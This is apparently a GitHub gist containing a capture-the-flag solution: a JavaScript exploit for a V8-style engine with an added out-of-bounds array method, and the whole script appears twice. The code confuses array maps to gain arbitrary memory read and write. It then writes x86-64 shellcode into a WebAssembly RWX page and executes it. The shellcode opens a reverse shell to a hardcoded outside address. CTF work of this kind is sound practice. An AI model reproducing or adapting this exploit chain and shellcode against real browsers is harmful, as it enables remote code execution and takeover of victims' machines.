wbowling/pwn.js

## pwn.js
// uses https://github.com/saelo/jscpwn/blob/master/utils.js
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
let f = wasm_mod.exports.hello;

var arr1 = [1.1];
var arr2 = [Date];

var arr_map1 = arr1.oob();
var arr_map2 = arr2.oob();

print(arr_map1);
print(Int64.fromDouble(arr_map1));
print(Int64.fromDouble(arr_map2));

var fake_arr = [
    arr_map1,
    0,
    arr_map2,
    new Int64("0x1000000000000").asDouble()
];

var ab = new ArrayBuffer(0x41);

var leak_arr = [fake_arr, ab, wasm_mod];
leak_arr.oob(arr_map1);
var fake_arr_addr = Int64.fromDouble(leak_arr[0]);
var ab_addr = Int64.fromDouble(leak_arr[1]);
let wasm_mod_addr = Int64.fromDouble(leak_arr[2]);


print("ab_addr: " + ab_addr);
print(fake_arr_addr);
print(new Int64(fake_arr_addr- -0x30));

var arr3 = [Date];
arr3.oob(arr_map1);
arr3[0] = new Int64(fake_arr_addr- -0x30).asDouble()
arr3.oob(arr_map2);
print(arr3[0].length);

fake_arr[2] = new Int64(ab_addr).asDouble();
oob_array = arr3[0];

function read(addr, size) {
    oob_array[1] = new Int64(size).asDouble()
    oob_array[2] = new Int64(addr).asDouble()
    let a = new Uint8Array(ab, 0, size);
    return Array.from(a);
}

function write(addr, bytes) {
    oob_array[1] = new Int64(bytes.length).asDouble()
    oob_array[2] = new Int64(addr).asDouble()
    let a = new Uint8Array(ab);
    a.set(bytes);
}

function read64(addr) {
  var a = read(addr, 8);
  return new Int64(a)
}


console.log("wasm_mod_addr", wasm_mod_addr);
rwx = read64(wasm_mod_addr-1+8*17)
console.log("rwx", rwx);

let shellcode = [
0x6a, 0x29, 0x58, 0x6a, 0x2, 0x5f, 0x6a, 0x1, 0x5e, 0x99, 0xf, 0x5, 0x48, 0x89, 0xc5, 0x48, 0xb8, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x50, 0x48, 0xb8, 0x3, 0x1, 0x31, 0x38, 0x66, 0x2, 0x3c, 0x88, 0x48, 0x31, 0x4, 0x24, 0x6a, 0x2a, 0x58, 0x48, 0x89, 0xef, 0x6a, 0x10, 0x5a, 0x48, 0x89, 0xe6, 0xf, 0x5,
0x6a, 0x3, 0x5e, 0x48, 0xff, 0xce, 0x78, 0xb, 0x56, 0x6a, 0x21, 0x58, 0x48, 0x89, 0xef, 0xf, 0x5, 0xeb, 0xef, 0x6a, 0x68, 0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x73, 0x50, 0x48, 0x89, 0xe7, 0x68, 0x72, 0x69, 0x1, 0x1, 0x81, 0x34, 0x24, 0x1, 0x1, 0x1, 0x1, 0x31, 0xf6, 0x56, 0x6a, 0x8, 0x5e, 0x48, 0x1, 0xe6, 0x56, 0x48, 0x89, 0xe6, 0x31, 0xd2, 0x6a, 0x3b, 0x58, 0xf, 0x5,
];
write(rwx, shellcode);
f();

alert();

// *CTF{D1d_y0u_p0p_4_calc_f0r_fun :P}
	// uses https://github.com/saelo/jscpwn/blob/master/utils.js
	var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
	let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
	let f = wasm_mod.exports.hello;

	var arr1 = [1.1];
	var arr2 = [Date];

	var arr_map1 = arr1.oob();
	var arr_map2 = arr2.oob();

	print(arr_map1);
	print(Int64.fromDouble(arr_map1));
	print(Int64.fromDouble(arr_map2));

	var fake_arr = [
	arr_map1,
	0,
	arr_map2,
	new Int64("0x1000000000000").asDouble()
	];

	var ab = new ArrayBuffer(0x41);

	var leak_arr = [fake_arr, ab, wasm_mod];
	leak_arr.oob(arr_map1);
	var fake_arr_addr = Int64.fromDouble(leak_arr[0]);
	var ab_addr = Int64.fromDouble(leak_arr[1]);
	let wasm_mod_addr = Int64.fromDouble(leak_arr[2]);


	print("ab_addr: " + ab_addr);
	print(fake_arr_addr);
	print(new Int64(fake_arr_addr- -0x30));

	var arr3 = [Date];
	arr3.oob(arr_map1);
	arr3[0] = new Int64(fake_arr_addr- -0x30).asDouble()
	arr3.oob(arr_map2);
	print(arr3[0].length);

	fake_arr[2] = new Int64(ab_addr).asDouble();
	oob_array = arr3[0];

	function read(addr, size) {
	oob_array[1] = new Int64(size).asDouble()
	oob_array[2] = new Int64(addr).asDouble()
	let a = new Uint8Array(ab, 0, size);
	return Array.from(a);
	}

	function write(addr, bytes) {
	oob_array[1] = new Int64(bytes.length).asDouble()
	oob_array[2] = new Int64(addr).asDouble()
	let a = new Uint8Array(ab);
	a.set(bytes);
	}

	function read64(addr) {
	var a = read(addr, 8);
	return new Int64(a)
	}


	console.log("wasm_mod_addr", wasm_mod_addr);
	rwx = read64(wasm_mod_addr-1+8*17)
	console.log("rwx", rwx);

	let shellcode = [
	0x6a, 0x29, 0x58, 0x6a, 0x2, 0x5f, 0x6a, 0x1, 0x5e, 0x99, 0xf, 0x5, 0x48, 0x89, 0xc5, 0x48, 0xb8, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x50, 0x48, 0xb8, 0x3, 0x1, 0x31, 0x38, 0x66, 0x2, 0x3c, 0x88, 0x48, 0x31, 0x4, 0x24, 0x6a, 0x2a, 0x58, 0x48, 0x89, 0xef, 0x6a, 0x10, 0x5a, 0x48, 0x89, 0xe6, 0xf, 0x5,
	0x6a, 0x3, 0x5e, 0x48, 0xff, 0xce, 0x78, 0xb, 0x56, 0x6a, 0x21, 0x58, 0x48, 0x89, 0xef, 0xf, 0x5, 0xeb, 0xef, 0x6a, 0x68, 0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x73, 0x50, 0x48, 0x89, 0xe7, 0x68, 0x72, 0x69, 0x1, 0x1, 0x81, 0x34, 0x24, 0x1, 0x1, 0x1, 0x1, 0x31, 0xf6, 0x56, 0x6a, 0x8, 0x5e, 0x48, 0x1, 0xe6, 0x56, 0x48, 0x89, 0xe6, 0x31, 0xd2, 0x6a, 0x3b, 0x58, 0xf, 0x5,
	];
	write(rwx, shellcode);
	f();

	alert();

	// *CTF{D1d_y0u_p0p_4_calc_f0r_fun :P}